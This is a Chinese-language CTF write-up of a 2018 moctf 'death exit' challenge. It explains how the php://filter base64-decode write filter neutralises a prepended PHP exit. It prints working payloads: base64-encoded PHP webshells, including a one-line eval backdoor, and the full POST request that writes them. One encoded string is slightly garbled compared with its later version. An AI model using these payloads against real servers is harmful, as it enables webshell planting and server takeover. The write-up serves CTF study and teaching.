php://filter的妙用

php://filter是PHP语言中特有的协议流，作用是作为一个“中间流”来处理其他流。比如，我们可以用如下一行代码将POST内容转换成base64编码并输出

以下是2018年moctf一道 死亡退出的题

查看源码：<?php exit;?>写在了最前面；说明当代码执行到这里会使代码直接退出，不会执行后续代码。所以我们要绕过这里！
先来分析下后续代码： 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思，后 file_put_contents
是把数据写入文件中。 这里绕过<?php exit ?>可以通过使用协议流的方法使用base64编码，绕过。

既：file=php://filter/write=convert.base64-decode/resource=tmp.php
接下来构造传入的字符串c：
（看了好多博客，发现他们给c传入的值都是<?php system('cat flag.php'); ?>）之所以都传他，是因为 题目说了flag在flag.php里面，所以写马。将<?php system('cat flag.php'); ?>
转化为base64编码如下:
c=aPD9waHAgc3lzdGVtKCdjYXQ1gZmxhZy5waHAnKTsgPz4=

而我自己写的时候，用的是构造了一句话木马，传入。
（目前还不清楚为啥都可以，难道是php文本的都可以？）
<?php @eval($_POST['c']);?>
转为base64编码传入：

c=aPD9waHAgQGV2YWwoJF9QT1NUWydjJ10pOz8+

因为phpexit一共7个字符，因为base64算法解码时是4个byte一组，所以给他增加1个“a”一共8个字符。这样，"phpexita"被正常解码，而后面我们传入的webshell的base64内容也被正常解码。
所以用post传入数据 ：c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php
后抓包运行即可！！！！！

参考文本：https://www.leavesongs.com/PENETRATION/php-filter-magic.html#xxe